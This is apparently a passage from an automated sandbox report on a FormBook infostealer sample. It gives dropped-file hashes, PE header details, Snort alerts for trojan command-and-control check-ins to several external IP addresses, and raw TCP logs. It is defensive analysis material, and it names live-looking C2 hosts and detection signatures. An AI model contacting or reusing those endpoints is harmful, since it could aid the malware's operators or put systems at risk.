                                            Preview:.<document WMSNameSpaceVersion="2.0">.... <node name="Control Protocol" opcode="create" >.. <node name="Object Store" opcode="create" >.. <node name="RTSP" opcode="create" >.. <node name="CLSID" opcode="create" type="string" value="{308786f0-8b15-11d2-b25f-006097d2e41e}" />.. <node name="Enabled" opcode="create" type="int32" value="0x1" />.. <node name="Properties" opcode="create" >.. <node name="Protocol" opcode="create" type="string" value="RTSP,RTSPA,RTSPT,RTSPU,RTSPM" />.. </node> Properties -->.... </node> RTSP -->.... <node name="Sessionless Multicast" opcode="create" >.. <node name="CLSID" opcode="create" type="string" value="{f9377800-f38d-11d2-b26c-006097d2e41e}" />.. <node name="Enabled" opcode="create" type="int32" value="0x1" />.. <node name="Properties" opcode="create" >.. <node name="Protocol" opcode="create" type="string" value="MCAST,RTP" />.. </node> Properties

                                            C:\Users\user\AppData\Local\Microsoft\Windows Media\12.0\WMSDKNS.XML.bak

                                            Download File
                                            Process:C:\Windows\System32\unregmp2.exe
                                            File Type:exported SGML document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                            Category:dropped
                                            Size (bytes):10191
                                            Entropy (8bit):4.792342140217129
                                            Encrypted:false
                                            SSDEEP:96:/YkZRAF6zyHUhm77yB1pZYCEnfHrHH7B6xTGH+YCLV3zwULJEYCJWyHBt3zwFRh+:/2FV0bBPCfUdY
                                            MD5:7050D5AE8ACFBE560FA11073FEF8185D
                                            SHA1:5BC38E77FF06785FE0AEC5A345C4CCD15752560E
                                            SHA-256:CB87767C4A384C24E4A0F88455F59101B1AE7B4FB8DE8A5ADB4136C5F7EE545B
                                            SHA-512:A7A295AC8921BB3DDE58D4BCDE9372ED59DEF61D4B7699057274960FA8C1D1A1DAFF834A93F7A0698E9E5C16DB43AF05E9FD2D6D7C9232F7D26FFCFF5FC5900B
                                            Malicious:false
                                            Preview:.<document WMSNameSpaceVersion="2.0">.... <node name="Control Protocol" opcode="create" >.. <node name="Object Store" opcode="create" >.. <node name="RTSP" opcode="create" >.. <node name="CLSID" opcode="create" type="string" value="{308786f0-8b15-11d2-b25f-006097d2e41e}" />.. <node name="Enabled" opcode="create" type="int32" value="0x1" />.. <node name="Properties" opcode="create" >.. <node name="Protocol" opcode="create" type="string" value="RTSP,RTSPA,RTSPT,RTSPU,RTSPM" />.. </node> Properties -->.... </node> RTSP -->.... <node name="Sessionless Multicast" opcode="create" >.. <node name="CLSID" opcode="create" type="string" value="{f9377800-f38d-11d2-b26c-006097d2e41e}" />.. <node name="Enabled" opcode="create" type="int32" value="0x1" />.. <node name="Properties" opcode="create" >.. <node name="Protocol" opcode="create" type="string" value="MCAST,RTP" />.. </node> Properties

                                            C:\Users\user\AppData\Local\Microsoft\Windows Media\12.0\WMSDKNSD.XML

                                            Download File
                                            Process:C:\Windows\System32\unregmp2.exe
                                            File Type:ASCII text, with CRLF line terminators
                                            Category:dropped
                                            Size (bytes):53
                                            Entropy (8bit):4.66869469064966
                                            Encrypted:false
                                            SSDEEP:3:sLRaE92JWyhHX9ovy4dduRun:sLzTyRXKvndI0
                                            MD5:A9B5DA9AEC61657B32393D96217165F0
                                            SHA1:80B5C577155ACD269B450D70F6B2CBED693EDF49
                                            SHA-256:9F4611369CF65B33D886489B2486FCA7B1E83E0DC998D35B15B3AA4C8478A28D
                                            SHA-512:0B73B232C03FFD5CE526A1EDE481A57C753D15D9EE39D4247ABFA52819B59FA676C63E30825DAF233E3139038C353DF84D652C4CE2CB71A706DDDBDFE0C70335
                                            Malicious:false
                                            Preview:<document WMSNameSpaceVersion="2.0">....</document>..

                                            C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                            Download File
                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):64
                                            Entropy (8bit):1.1510207563435464
                                            Encrypted:false
                                            SSDEEP:3:NlllulRjFllp:NllU
                                            MD5:7B390667B7AD392C3A7ECD95310E0D68
                                            SHA1:F7ED92E360DACA5B2BB3152AFB8A26DD5A408706
                                            SHA-256:E233F71BD3E7F3B34DC94F8F9DDB533F59E07BE7AEFA021541DF0160436E1C0D
                                            SHA-512:0131C5BD611E47AF843A354F9AD83CAE0AA4A64B0FB723BB485B9FBDBF409A98BB5248336BCDE84FF72E3EB44D2EC10C30133767CD0DE32C77757C0EE75DCCC2
                                            Malicious:false
                                            Preview:@...e.................................@. ............@..........

                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_az4vgb33.mej.psm1

                                            Download File
                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:ASCII text, with no line terminators
                                            Category:dropped
                                            Size (bytes):60
                                            Entropy (8bit):4.038920595031593
                                            Encrypted:false
                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                            Malicious:false
                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ejalo0vz.3ve.ps1

                                            Download File
                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:ASCII text, with no line terminators
                                            Category:dropped
                                            Size (bytes):60
                                            Entropy (8bit):4.038920595031593
                                            Encrypted:false
                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                            Malicious:false
                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hechhxji.0w3.psm1

                                            Download File
                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:ASCII text, with no line terminators
                                            Category:dropped
                                            Size (bytes):60
                                            Entropy (8bit):4.038920595031593
                                            Encrypted:false
                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                            Malicious:false
                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xqrdxq0w.wkj.ps1

                                            Download File
                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:ASCII text, with no line terminators
                                            Category:dropped
                                            Size (bytes):60
                                            Entropy (8bit):4.038920595031593
                                            Encrypted:false
                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                            Malicious:false
                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                            C:\Users\user\AppData\Local\Temp\c23yo28O4

                                            Download File
                                            Process:C:\Windows\SysWOW64\sc.exe
                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x37, schema 4, UTF-8, version-valid-for 8
                                            Category:dropped
                                            Size (bytes):196608
                                            Entropy (8bit):1.1239949490932863
                                            Encrypted:false
                                            SSDEEP:384:g2qOB1nxCkvSA1LyKOMq+8iP5GDHP/0j:9q+n0E91LyKOMq+8iP5GLP/0
                                            MD5:271D5F995996735B01672CF227C81C17
                                            SHA1:7AEAACD66A59314D1CBF4016038D3A0A956BAF33
                                            SHA-256:9D772D093F99F296CD906B7B5483A41573E1C6BD4C91EF8DBACDA79CDF1436B4
                                            SHA-512:62F15B7636222CA89796FCC23FC5722657382FAAAFEDC937506CAB3286AA696609F2A5A8F479158574D9FB92D37C0AA74EA15F7A172EBF1F3D260EF6124CF8B9
                                            Malicious:false
                                            Preview:SQLite format 3......@ .......Y...........7......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                            C:\Users\user\AppData\Local\Temp\wmsetup.log

                                            Download File
                                            Process:C:\Windows\SysWOW64\unregmp2.exe
                                            File Type:ASCII text, with CRLF line terminators
                                            Category:modified
                                            Size (bytes):1301
                                            Entropy (8bit):5.109506535588655
                                            Encrypted:false
                                            SSDEEP:24:ttoMlRs2WeHx1hZFYwzYAx0VoMARs2WeHx1hZFXx0VY1YRs2WeHx1H9sI9kYIVYc:4MrVR16wvx0KMIVR1Zx0G1AVR1d+YIGc
                                            MD5:03050AD13AFAF3E0C64BEF47FAF9A5FA
                                            SHA1:7A519E489EE8C735784E1BA77F15AF6578D6B9DB
                                            SHA-256:16AD883E5ACAEC348F9CD7E435920E85A4DBE0832357E185C73F8DFD15004A8B
                                            SHA-512:519E2C7B313A62C675779DF1852400F61DA2467DE5DA4ECAFB35949B8A2EED1ED2BE4D11DC17DD3321587676121ED92815F7E6923DB9C030AD9A480B14E149A5
                                            Malicious:false
                                            Preview:..[*WMC Logging begun at 2023/10/05 - 07:17:58. Logging at level: '4'. OS is NT. OSVer is 10.0.19045.0.1889. System Lang is 2057. Prev version system is 12.0.19041.1266. Setup version 12.0.19041.1.]..Checking for Playlist Obfuscation...Playlist location not obfuscated. Doing Obfuscation now...Obfuscation for Playlist location succeeded...Current command line: '/FirstLogon'.....[*WMC Logging begun at 2023/10/05 - 07:17:59. Logging at level: '4'. OS is NT. OSVer is 10.0.19045.0.1889. System Lang is 2057. Prev version system is 12.0.19041.1266. Setup version 12.0.19041.1.]..Checking for Playlist Obfuscation...Playlist location already obfuscated...Current command line: '/FirstLogon'.....[*WMC Logging begun at 2024/07/03 - 12:52:29. Logging at level: '4'. OS is NT. OSVer is 10.0.19045.0.1889. System Lang is 2057. Prev version system is 12.0.19041.1266. Setup version 12.0.19041.1.]..ERROR: Caller attempted to run 32bit unregmp2 on 64bit Windows. Call being switched to correct unre

                                            C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\74d7f43c1561fc1e.customDestinations-ms (copy)

                                            Download File
                                            Process:C:\Program Files (x86)\Windows Media Player\wmplayer.exe
                                            File Type:Matlab v4 mat-file (little endian) \253\373\277\272\002, sparse, rows 2, columns 0, imaginary
                                            Category:dropped
                                            Size (bytes):1868
                                            Entropy (8bit):3.318391119132836
                                            Encrypted:false
                                            SSDEEP:24:u92/EndOEJLMyUwUyAJyMSHcGYEXGhyQ3+fe4IUeLXRhnm+:Q2cndO0YpwURJyR/YEeyQ3CIhn1
                                            MD5:625B3C470881CEE9F5AA662AC6B67DF1
                                            SHA1:FA9ECB2122AE5C9D56B6A296DFDC06E36BCCBD2E
                                            SHA-256:C27FDCE8D8E37374798CF1CB16C1FB740F97E0DFE9D53173C6F65242E5256F23
                                            SHA-512:80E0ABFEC62C098126E001648A714AD576258725EF24A3214C9B63985E0A348A0228B2F4B221F6E1C1CA018AA4781255211BFE4DEB26854788D40E85BAFBA32C
                                            Malicious:false
                                            Preview:...............................................FL..................F.@.. ......$0...W..fi......$0................................P.O. .:i.....+00.../C:\.....................1......Xz...PROGRA~2.........O.I.Xz.....................V.........P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.)...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.7.....r.1.....(Um...WINDOW~4..Z......O"v.X......".....................K...W.i.n.d.o.w.s. .M.e.d.i.a. .P.l.a.y.e.r.....f.2.....(U.. .wmplayer.exe..J......(U...X..................x.........[h..w.m.p.l.a.y.e.r...e.x.e.......g...............-.......f............7k......C:\Program Files (x86)\Windows Media Player\wmplayer.exe..=./.p.r.e.f.e.t.c.h.:.1.1. ./.Q.u.e.r.y.:.3.;.3.;.6.;.P.l.a.y. .a.l.l. .m.u.s.i.c.;.2.9.5.1.8.;.-.1.;.;.;.;.0.;.;.;.;.2.;.;...C.:.\.W.i.n.d.o.w.s.\.S.Y.S.T.E.M.3.2.\.w.m.p.l.o.c...d.l.l.........%SystemRoot%\SYSTEM32\wmploc.dll..................................................................................................................................

                                            C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\TODI86YM2ECAGF8F0K0X.temp

                                            Download File
                                            Process:C:\Program Files (x86)\Windows Media Player\wmplayer.exe
                                            File Type:Matlab v4 mat-file (little endian) \253\373\277\272\002, sparse, rows 2, columns 0, imaginary
                                            Category:dropped
                                            Size (bytes):1868
                                            Entropy (8bit):3.318391119132836
                                            Encrypted:false
                                            SSDEEP:24:u92/EndOEJLMyUwUyAJyMSHcGYEXGhyQ3+fe4IUeLXRhnm+:Q2cndO0YpwURJyR/YEeyQ3CIhn1
                                            MD5:625B3C470881CEE9F5AA662AC6B67DF1
                                            SHA1:FA9ECB2122AE5C9D56B6A296DFDC06E36BCCBD2E
                                            SHA-256:C27FDCE8D8E37374798CF1CB16C1FB740F97E0DFE9D53173C6F65242E5256F23
                                            SHA-512:80E0ABFEC62C098126E001648A714AD576258725EF24A3214C9B63985E0A348A0228B2F4B221F6E1C1CA018AA4781255211BFE4DEB26854788D40E85BAFBA32C
                                            Malicious:false
                                            Preview:...............................................FL..................F.@.. ......$0...W..fi......$0................................P.O. .:i.....+00.../C:\.....................1......Xz...PROGRA~2.........O.I.Xz.....................V.........P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.)...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.7.....r.1.....(Um...WINDOW~4..Z......O"v.X......".....................K...W.i.n.d.o.w.s. .M.e.d.i.a. .P.l.a.y.e.r.....f.2.....(U.. .wmplayer.exe..J......(U...X..................x.........[h..w.m.p.l.a.y.e.r...e.x.e.......g...............-.......f............7k......C:\Program Files (x86)\Windows Media Player\wmplayer.exe..=./.p.r.e.f.e.t.c.h.:.1.1. ./.Q.u.e.r.y.:.3.;.3.;.6.;.P.l.a.y. .a.l.l. .m.u.s.i.c.;.2.9.5.1.8.;.-.1.;.;.;.;.0.;.;.;.;.2.;.;...C.:.\.W.i.n.d.o.w.s.\.S.Y.S.T.E.M.3.2.\.w.m.p.l.o.c...d.l.l.........%SystemRoot%\SYSTEM32\wmploc.dll..................................................................................................................................

                                            C:\Windows\appcompat\Programs\Amcache.hve

                                            Download File
                                            Process:C:\Windows\System32\WerFault.exe
                                            File Type:MS Windows registry file, NT/2000 or above
                                            Category:dropped
                                            Size (bytes):1835008
                                            Entropy (8bit):4.469355824539876
                                            Encrypted:false
                                            SSDEEP:6144:UzZfpi6ceLPx9skLmb0fTZWSP3aJG8nAgeiJRMMhA2zX4WABluuN1jDH5S:aZHtTZWOKnMM6bFpvj4
                                            MD5:A745BBECD0B770822EC76CDA982B72B2
                                            SHA1:3451ED80B0B596321888087262D7836D4088F05F
                                            SHA-256:1E4AFF0C37524676CF5ACC87A0B1A5C0F6548C24D3268EA1543E17F82D7E4DCC
                                            SHA-512:5F5629B4814903180D3E70F065D38762B9D4A629284838BF54225F154E765415488F756FD69B6A98008C92908421EDEC9FB614F02D59282777F3AFBC2CFDC940
                                            Malicious:false
                                            Preview:regfH...H....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm..GQi...............................................................................................................................................................................................................................................................................................................................................a.Pe........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                            Static File Info

                                            General

                                            File type:PE32+ executable (console) x86-64 Mono/.Net assembly, for MS Windows
                                            Entropy (8bit):5.040839027931189
                                            TrID:
                                            • Win64 Executable Console Net Framework (206006/5) 48.58%
                                            • Win64 Executable Console (202006/5) 47.64%
                                            • Win64 Executable (generic) (12005/4) 2.83%
                                            • Generic Win/DOS Executable (2004/3) 0.47%
                                            • DOS Executable Generic (2002/1) 0.47%
                                            File name:SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exe
                                            File size:2'928'646 bytes
                                            MD5:0d866e84b1b42f3b924d671db5b3b40e
                                            SHA1:8890d49ef3267c6c6697c0e56b85ce118e0f7eef
                                            SHA256:74f7be7a0e6e10f0209d700876ab03eb9d37cdcab79c0def5d536eb8accbf49f
                                            SHA512:15ede3729834e4f39d770301f59cf5ff3778a801b03cd9b4bcfcabf2175440aa54d24e39028fbe4ff35f7954115790ade310318ec6e03dc97b0a14281fe2ad2a
                                            SSDEEP:12288:oR2wucz+/euGRF7y7MrSE6blzZ5JpdxqLHqgyUbeLXp6ZzwsRYj:ojzBuCKx7FZ5JpdxqLHqYZz/RYj
                                            TLSH:F2D5AF91BA078C97FC1212B1C8EAB9F001FD5D5B70F4610FEF657D1266B227E10A693A
                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d...RJ.f.........."...0.J.... ........... ....@...... ................................-...`................................

                                            File Icon

                                            Icon Hash:1c188bc89a2c567b

                                            Static PE Info

                                            General

                                            Entrypoint:0x400000
                                            Entrypoint Section:
                                            Digitally signed:false
                                            Imagebase:0x400000
                                            Subsystem:windows cui
                                            Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                            DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                            Time Stamp:0x66854A52 [Wed Jul 3 12:55:46 2024 UTC]
                                            TLS Callbacks:
                                            CLR (.Net) Version:
                                            OS Version Major:4
                                            OS Version Minor:0
                                            File Version Major:4
                                            File Version Minor:0
                                            Subsystem Version Major:4
                                            Subsystem Version Minor:0
                                            Import Hash:

                                            Entrypoint Preview

                                            Instruction
                                            dec ebp
                                            pop edx
                                            nop
                                            add byte ptr [ebx], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax+eax], al
                                            add byte ptr [eax], al

                                            Data Directories

                                            NameVirtual AddressVirtual Size Is in Section
                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                            IMAGE_DIRECTORY_ENTRY_IMPORT0x00x0
                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0xc0000x41e8a.rsrc
                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                            IMAGE_DIRECTORY_ENTRY_DEBUG0xa1ae0x1c.text
                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                            IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20000x48.text
                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                            Sections

                                            NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                            .text0x20000x824a0x8400484a8a7d4a7734f4b979f98fa0e1c448False0.6228693181818182data6.412680721843412IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                            .rsrc0xc0000x41e8a0x420008e1b805faf0f64b3bfda47f00afb0c72False0.16034490411931818data4.272099652497228IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                            Resources

                                            NameRVASizeTypeLanguageCountryZLIB Complexity
                                            RT_ICON0xc15c0x41428Device independent bitmap graphic, 253 x 512 x 32, image size 259072, resolution 3779 x 3779 px/m0.15837772723191573
                                            RT_GROUP_ICON0x4d5840x14data1.2
                                            RT_VERSION0x4d5980x384data0.48
                                            RT_VERSION0x4d91c0x384dataEnglishUnited States0.4777777777777778
                                            RT_MANIFEST0x4dca00x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347

                                            Possible Origin

                                            Language of compilation systemCountry where language is spokenMap
                                            EnglishUnited States

                                            Network Behavior

                                            Snort IDS Alerts

                                            TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                            07/03/24-18:41:52.311175TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M35942480192.168.2.6152.32.156.214
                                            07/03/24-18:41:19.435884TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M35941780192.168.2.681.88.57.70
                                            07/03/24-18:42:13.805576TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M25943280192.168.2.664.190.62.22
                                            07/03/24-18:43:25.886197TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M35945180192.168.2.647.239.13.172
                                            07/03/24-18:43:37.573012TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M35945480192.168.2.647.239.13.172
                                            07/03/24-18:40:48.928266TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M35940780192.168.2.681.88.48.71
                                            07/03/24-18:42:55.058990TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M35944180192.168.2.6142.250.185.211
                                            07/03/24-18:43:51.413894TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M35945880192.168.2.646.235.40.27
                                            07/03/24-18:41:32.918372TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M35942180192.168.2.6203.161.49.220
                                            07/03/24-18:42:06.211099TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M35942980192.168.2.664.190.62.22
                                            07/03/24-18:42:27.326971TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M25943680192.168.2.623.105.172.12
                                            07/03/24-18:43:45.249021TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M25945780192.168.2.647.239.13.172
                                            07/03/24-18:42:08.749026TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M35943080192.168.2.664.190.62.22
                                            07/03/24-18:43:30.949272TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M25945380192.168.2.647.239.13.172
                                            07/03/24-18:42:41.373375TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M35943780192.168.2.6185.151.30.199
                                            07/03/24-18:40:56.597601TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M25941080192.168.2.681.88.48.71
                                            07/03/24-18:42:19.719004TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M35943380192.168.2.623.105.172.12
                                            07/03/24-18:43:59.021042TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M25946180192.168.2.646.235.40.27
                                            07/03/24-18:41:37.979242TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M25942380192.168.2.6203.161.49.220
                                            07/03/24-18:41:54.857034TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M35942680192.168.2.6152.32.156.214
                                            07/03/24-18:42:57.593154TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M35944280192.168.2.6142.250.185.211
                                            07/03/24-18:44:08.627000TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M25946280192.168.2.689.31.143.90
                                            07/03/24-18:41:30.383840TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M35942080192.168.2.6203.161.49.220
                                            07/03/24-18:42:22.262975TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M35943480192.168.2.623.105.172.12
                                            07/03/24-18:41:06.087866TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M35941280192.168.2.6156.251.142.105
                                            07/03/24-18:43:02.663109TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M25944580192.168.2.6142.250.185.211
                                            07/03/24-18:43:11.697394TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M35944780192.168.2.647.239.13.172
                                            07/03/24-18:41:59.948522TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M25942880192.168.2.6152.32.156.214
                                            07/03/24-18:42:49.010973TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M25944080192.168.2.6185.151.30.199
                                            07/03/24-18:43:23.357004TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M35945080192.168.2.647.239.13.172
                                            07/03/24-18:41:24.528998TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M25941980192.168.2.681.88.57.70
                                            07/03/24-18:40:33.146485TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M25940180192.168.2.689.31.143.90
                                            07/03/24-18:42:43.900906TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M35943880192.168.2.6185.151.30.199
                                            07/03/24-18:41:16.892814TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M35941680192.168.2.681.88.57.70
                                            07/03/24-18:43:16.765404TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M25944980192.168.2.647.239.13.172
                                            07/03/24-18:41:03.551279TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M35941180192.168.2.6156.251.142.105
                                            07/03/24-18:43:40.139322TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M35945580192.168.2.647.239.13.172
                                            07/03/24-18:40:51.463532TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M35940880192.168.2.681.88.48.71
                                            07/03/24-18:43:53.949463TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M35945980192.168.2.646.235.40.27
                                            07/03/24-18:41:11.155608TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M25941480192.168.2.6156.251.142.105
                                            07/03/24-18:43:09.167025TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M35944680192.168.2.647.239.13.172

                                            Network Port Distribution

                                            TCP Packets

                                            TimestampSource PortDest PortSource IPDest IP
                                            Jul 3, 2024 18:52:31.018404961 CEST4971980192.168.2.689.31.143.90
                                            Jul 3, 2024 18:52:31.023323059 CEST804971989.31.143.90192.168.2.6
                                            Jul 3, 2024 18:52:31.023411036 CEST4971980192.168.2.689.31.143.90
                                            Jul 3, 2024 18:52:31.026048899 CEST4971980192.168.2.689.31.143.90
                                            Jul 3, 2024 18:52:31.030908108 CEST804971989.31.143.90192.168.2.6
                                            Jul 3, 2024 18:52:31.684258938 CEST804971989.31.143.90192.168.2.6
                                            Jul 3, 2024 18:52:31.684350014 CEST804971989.31.143.90192.168.2.6
                                            Jul 3, 2024 18:52:31.684400082 CEST804971989.31.143.90192.168.2.6
                                            Jul 3, 2024 18:52:31.684416056 CEST804971989.31.143.90192.168.2.6
                                            Jul 3, 2024 18:52:31.684437037 CEST804971989.31.143.90192.168.2.6
                                            Jul 3, 2024 18:52:31.684451103 CEST804971989.31.143.90192.168.2.6
                                            Jul 3, 2024 18:52:31.684464931 CEST804971989.31.143.90192.168.2.6
                                            Jul 3, 2024 18:52:31.684494972 CEST804971989.31.143.90192.168.2.6
                                            Jul 3, 2024 18:52:31.684510946 CEST804971989.31.143.90192.168.2.6
                                            Jul 3, 2024 18:52:31.684659004 CEST4971980192.168.2.689.31.143.90
                                            Jul 3, 2024 18:52:31.690493107 CEST4971980192.168.2.689.31.143.90
                                            Jul 3, 2024 18:52:31.695302010 CEST804971989.31.143.90192.168.2.6
                                            Jul 3, 2024 18:52:46.807109118 CEST4972380192.168.2.681.88.48.71
                                            Jul 3, 2024 18:52:46.812325954 CEST804972381.88.48.71192.168.2.6
                                            Jul 3, 2024 18:52:46.814584970 CEST4972380192.168.2.681.88.48.71
                                            Jul 3, 2024 18:52:46.816431999 CEST4972380192.168.2.681.88.48.71
                                            Jul 3, 2024 18:52:46.821361065 CEST804972381.88.48.71192.168.2.6
                                            Jul 3, 2024 18:52:47.505155087 CEST804972381.88.48.71192.168.2.6
                                            Jul 3, 2024 18:52:47.505317926 CEST804972381.88.48.71192.168.2.6
                                            Jul 3, 2024 18:52:47.505378008 CEST4972380192.168.2.681.88.48.71
                                            Jul 3, 2024 18:52:48.328389883 CEST4972380192.168.2.681.88.48.71
                                            Jul 3, 2024 18:52:49.346865892 CEST4972480192.168.2.681.88.48.71
                                            Jul 3, 2024 18:52:49.351807117 CEST804972481.88.48.71192.168.2.6
                                            Jul 3, 2024 18:52:49.351984024 CEST4972480192.168.2.681.88.48.71
                                            Jul 3, 2024 18:52:49.353669882 CEST4972480192.168.2.681.88.48.71
                                            Jul 3, 2024 18:52:49.358489990 CEST804972481.88.48.71192.168.2.6
